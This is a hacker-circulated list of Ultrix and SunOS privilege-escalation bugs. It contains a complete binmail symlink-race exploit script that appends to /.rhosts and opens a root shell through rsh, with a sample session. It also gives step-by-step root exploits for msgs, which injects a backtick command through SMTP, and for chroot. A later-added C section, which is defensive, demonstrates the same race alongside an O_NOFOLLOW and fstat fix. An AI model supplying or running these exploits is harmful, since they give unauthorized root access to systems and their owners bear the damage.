List of bugs and exploits for ULTRIX v0.1

This list contains all the bugs I found in CERT advisories, www sites, list servers, and hackers' sites. It is a good (I think) collection of bugs. These bugs and exploits are not for breaking into a system but for gaining root access. If you have another bug to report, mail to: ngm@matrix.kapatel.gr, or just add it to the list.

*****************************************************************************

binmail(1) (/usr/bin/mail)

Systems Affected:

    Ultrix 4.3, 4.3A, 4.4
    SunOS 4.1.x
    OSF/1 1.2, 1.3, and 2.0
    Solbourne ?.?
    (Possibly other platforms)

Problem:

A race condition exists in binmail(1), which allows files to be created in arbitrary places on the filesystem. These files can be owned by arbitrary (usually system) users.

This example demonstrates how to become root on most affected machines by creating/appending-to root's .rhosts file. Please do not do this unless you have permission.

Create the following file, 'mailscript':

8<--------------------------- cut here ----------------------------
#!/bin/sh
#
# Syntax: mailscript user target-file rsh-user
#
# This exploits a flaw in SunOS binmail(1), and attempts
# to become the specified 'user', by creating a .rhosts
# file and using rsh.
#
# Written 1992 by [8LGM]
# Please do not use this script without permission.
#

PATH=/usr/ucb:/usr/bin:/bin
export PATH
IFS=" "
export IFS

PROG="`basename $0`"
SPOOLDIR="/var/spool/mail"

# Check args
if [ $# -ne 3 ]; then
	echo "Syntax: $PROG user target-file rsh-user"
	exit 1
fi

TARGET="$1"
TARGET_FILE="$2"
RSH_USER="$3"

# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
	echo "Sorry, this only works on SunOS"
	exit 1
fi

# Check user exists
grep "^$TARGET:" /etc/passwd >/dev/null 2>&1
if [ $? -ne 0 ]; then
	echo "$PROG: Warning, $TARGET not in local passwd file"
	# We continue though, might be in the YP passwd file
fi

# Check target file
if [ -f $TARGET_FILE ]; then
	OLD_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/null
	echo "$PROG: Warning, $TARGET_FILE already exists, appending"
else
	OLD_TARGET_LEN=0
fi

# Delete spool file if its a link, and we are able
if [ -h "$SPOOLDIR/$TARGET" ]; then
	rm -f "$SPOOLDIR/$TARGET"
	# Dont worry about errors, we catch it below
fi

# Check mail file
if [ -f "$SPOOLDIR/$TARGET" ]; then
	echo "$PROG: ${TARGET}'s mail file exists."
	exit 1
fi

# Make the race program
cat >mailrace.c << 'EOF'
#include <stdio.h>
#include <unistd.h>

char lockfile[] = ".lock";

main(argc,argv)
int argc;
char *argv[];
{
	char path[128];

	if (argc != 3) {
		fprintf(stderr, "Usage: %s mailfile newfile\n", argv[0]);
		exit(1);
	}

	strcpy(path, argv[1]);
	strcat(path, lockfile);

	/* Spin until the mailer's lock file appears, then plant the link */
	while(access(path, F_OK));
	symlink(argv[2], argv[1]);
}
EOF

cc -o mailrace mailrace.c

# Check we now have mailrace
if [ ! -x "mailrace" ]; then
	echo "$PROG: couldnt compile mailrace.c - check it out"
	exit 1
fi

# Start mailrace
./mailrace $SPOOLDIR/$TARGET $TARGET_FILE &
RACE_PID=$!

# Send mail to the user
NEW_TARGET_LEN=$OLD_TARGET_LEN
while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do
	echo "Sending mail to $TARGET"
	echo "localhost $USER" | /bin/mail $TARGET
	sleep 10

	kill -STOP $RACE_PID
	rm -f $SPOOLDIR/$TARGET >/dev/null 2>&1
	if [ -f $SPOOLDIR/$TARGET ]; then
		echo "$PROG: Sorry, we lost the race - cant try again."
		kill -9 $RACE_PID
		exit 1
	fi
	kill -CONT $RACE_PID

	if [ -f "$TARGET_FILE" ]; then
		NEW_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/null
	else
		NEW_TARGET_LEN=0
	fi

	if [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; then
		echo "We drew the race that time, trying again"
	fi
done

# We won the race
kill -9 $RACE_PID
echo "We won the race, becoming $RSH_USER"
rsh localhost -l $RSH_USER sh -i
exit 0
8<--------------------------- cut here ----------------------------

(Lines marked with > represent user input)

Check what root users are on the system:

> % grep :0: /etc/passwd
root:*:0:1:Operator:/:/bin/csh
sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
+::0:0:::

We choose a user with UID 0, but without a mail spool file under /var/spool/mail/:

> % ls -l /var/spool/mail/sysdiag
/var/spool/mail/sysdiag not found

Execute mailscript. The user is sysdiag, the target file is /.rhosts, and the user to rsh to on success is root:

> % chmod 700 mailscript
> % ./mailscript sysdiag /.rhosts root
mailscript: Warning, /.rhosts already exists, appending
Sending mail to sysdiag
We won the race, becoming root
./mailscript: 11051 Killed
#

This problem exists because /var/spool/mail is rwxrwxrwt. (Other systems have their spool dir rwxrwxr-x, and run their MUAs sgid mail.)

Before it opens the mail file, binmail does an lstat(2) to check that it is not about to write to a linked file. The intention is to prevent arbitrary files from being created or appended to. However, there exists a window of opportunity between lstat(2) and open(2); if a link is created after lstat, open will then follow the link.

This is not a straightforward task, as it is not possible to predict when to create the link. Therefore it is necessary to have a program (mailrace) which continually creates links and then removes them.
To exploit the window of opportunity, it is required that the link has been removed before the context switch for lstat, but exists for open. There are three possible outcomes for this race:

1) lstat finds a link - mail returned to sender.
2) link does not exist for lstat, but does for open - file created - we win.
3) link does not exist for lstat or open - mailbox created. In this case, it is not possible to remove the mailbox (as the sticky bit is set on /var/spool/mail), so it is necessary to choose another target user.

In tests, it would appear that the chances of 1) and 2) occurring are approximately equal, with the chance of 3) being somewhat lower.

Please note that this vulnerability may exist on other platforms where the mail spool directory has mode 777 and /bin/mail is setuid root.

*** msgs(1)

exploit:

DO NOT DISTRIBUTE THIS F***ING BUG. It works on Ultrix, and is one of the few Ultrix bugs I have seen that still works. It might work on other platforms too. This bug has been fixed in OSF, but not in Ultrix. It should also work on any system that has the msgs mail alias.

$ grep msgs /etc/aliases
msgs: "|/usr/ucb/msgs -s"

Ok, the first thing to do is look in the /usr/msgs directory (or whatever the directory is where the msgs files are kept), and see what the next msgs file will be (if there are 1 and 2, then the next one is pretty easy to figure out). Then, make an executable /tmp/a that, like, makes an suid shell (this is pretty easy to do; if you can't do it, don't consider yourself a hacker). By default, newsyslog executes every 6 days at 4 am, but it depends on the setup in crontab. What it does is age the syslog file (at /usr/adm/syslog.1, .2, ..., I think).

symlink /usr/msgs/ -> /usr/adm/newsyslog

$ telnet
telnet> o localhost 25
mail shit, version, etc
expn msgs
250 <"| /usr/ucb/msgs -s">
mail from: <`/tmp/a`>
rcpt to: msgs
data
doesn't matter what you put here
.
quit

So now, when it writes to /usr/msgs/, it will overwrite /usr/adm/newsyslog, and since /usr/adm/newsyslog is a shell script, it will expand `/tmp/a` by executing /tmp/a AS ROOT, giving you an suid shell or whatever /tmp/a does. From there, just clean up after yourself.

*** chroot(1)

Systems Affected: Ultrix 4.0 and 4.1

Problem: By default, /usr/bin/chroot is improperly installed. System users can gain unauthorized privileges.

Exploit:

mkdir root
cd root
mkdir bin etc usr
cd bin
cp /bin/sh sh
cp /bin/su su
cd ../etc
cp /etc/passwd.orig passwd
cp /etc/group group
vi passwd                        (modify root password to root::0:0, etc)
cd ..
chroot /blah/blah/blah/root /bin/sh
su
chown root /bin/sh
chmod 2755 /bin/sh
chmod u+s /bin/sh                {shit.. you gotta copy chmod & chown before you do the chroot}
exit
exit                             {now you're back in the original process}
/blah/blah/blah/root/bin/sh

*** binmail(1)

Systems Affected: Ultrix 4.0 and 4.1

Problem: A potential security vulnerability has been identified in ULTRIX Version 4.1 where, under certain circumstances, user privileges can be expanded via /usr/bin/mail. This problem applies to both the VAX and DEC RISC (i.e. DECsystem and DECstation) architectures.

*** telnet(1)

Systems Affected: Ultrix 4.1 and 4.2

Problem: A vulnerability exists such that ULTRIX 4.1 and 4.2 systems running the LAT/Telnet gateway software can allow unauthorized privileged access. Anyone who can access a terminal or modem connected to the LAT server running the LAT/Telnet service can gain unauthorized root privileges.

*** xconsole(1)

Systems Affected: Ultrix systems with X11 libs installed yet lacking a /dev/xcons.

Problem: /usr/lib/X11/xconsole can be used to destructively overwrite any file on the system. To duplicate, set the display to a working server, create a symbolic link from /tmp/Xconsole.log to the file to be overwritten, and run xconsole. The target file will be overwritten with a single line error message concerning a nonexistent /dev/xcons.
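Two of the entries above share one root cause: a privileged program writes to a path an unprivileged user can point elsewhere with a symbolic link. binmail checks the name with lstat(2) and then opens it, leaving the window the mailrace program wins; xconsole never checks /tmp/Xconsole.log at all. The following is an added example written for this page, not code from the list, from Ultrix, or from [8LGM]. It puts the check-then-open pattern beside a version that opens with O_NOFOLLOW and then inspects the descriptor with fstat(2), so the decision is made on the object actually opened rather than on a name that may have changed. The window_hook argument is an assumption of the demo: it stands in for whatever happens on the system between the two system calls, and the demo plants a link there. It assumes a POSIX system with O_NOFOLLOW (Linux, the BSDs, macOS) and a writable /tmp; the file names are constructed.

```c
/* Added example (not from the list above, nor Ultrix/8LGM code):
 * lstat-then-open beside an O_NOFOLLOW + fstat opener, with a hook
 * (demo assumption) standing in for the window between the two calls. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

typedef void (*window_hook)(void *ctx);

/* Check-then-open, as the binmail entry describes it: a link that already
 * exists is refused, but a link created after lstat() returns is followed
 * by open(). Returns a descriptor, or -1 with errno set. */
int append_open_racy(const char *path, window_hook hook, void *ctx)
{
    struct stat st;
    if (lstat(path, &st) == 0 && S_ISLNK(st.st_mode)) {
        errno = ELOOP;
        return -1;
    }
    if (hook) hook(ctx);                    /* the lstat(2)..open(2) window */
    return open(path, O_WRONLY | O_APPEND | O_CREAT, 0600);
}

/* Hardened: no separate check on the name. O_NOFOLLOW makes open() fail
 * (ELOOP) if the final component is a symlink, and fstat() on the
 * descriptor verifies what was really opened. Returns fd or -1. */
int append_open_safe(const char *path, window_hook hook, void *ctx)
{
    struct stat st;
    if (hook) hook(ctx);                    /* same window, now harmless */
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);                          /* not a plain, singly linked file */
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed hook for the demo: inside the window, make 'link' point at
 * 'target', the way mailrace does once the lock file appears. */
struct plant { const char *link; const char *target; };

static void plant_link(void *ctx)
{
    struct plant *p = ctx;
    symlink(p->target, p->link);
}

/* Runs one scenario in a fresh directory under /tmp (assumption: /tmp is
 * writable). Returns the size of the protected file afterwards:
 * 1 means the append was redirected into it, 0 means the opener refused,
 * -1 means setup failed. */
long demo_race(int hardened)
{
    char dir[] = "/tmp/spoolrace-XXXXXX";
    char spool[64], target[64];
    struct stat st;
    long size;

    if (!mkdtemp(dir))
        return -1;
    snprintf(spool, sizeof spool, "%s/mbox", dir);        /* the "mailbox" */
    snprintf(target, sizeof target, "%s/protected", dir); /* stands in for /.rhosts */

    int tfd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (tfd < 0)
        return -1;
    close(tfd);

    struct plant p = { spool, target };
    int fd = hardened ? append_open_safe(spool, plant_link, &p)
                      : append_open_racy(spool, plant_link, &p);
    if (fd >= 0) {
        ssize_t n = write(fd, "x", 1);      /* one byte of "mail" */
        (void)n;
        close(fd);
    }

    size = (stat(target, &st) == 0) ? (long)st.st_size : -1;
    unlink(spool);
    unlink(target);
    rmdir(dir);
    return size;
}

int main(void)
{
    printf("lstat then open : protected file grew by %ld byte(s)\n", demo_race(0));
    printf("O_NOFOLLOW+fstat: protected file grew by %ld byte(s)\n", demo_race(1));
    return 0;
}
```

The racy variant reports 1 (the byte landed in the protected file through the link) and the hardened variant 0 (open failed with ELOOP and nothing was written). The same two lines of defence apply to the spool directory itself: a mode 1777 spool with a setuid-root mailer is what makes the link plantable in the first place, which is why the entry notes that other systems use rwxrwxr-x plus an sgid-mail MUA instead.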
*****************************************************************************

-EastMan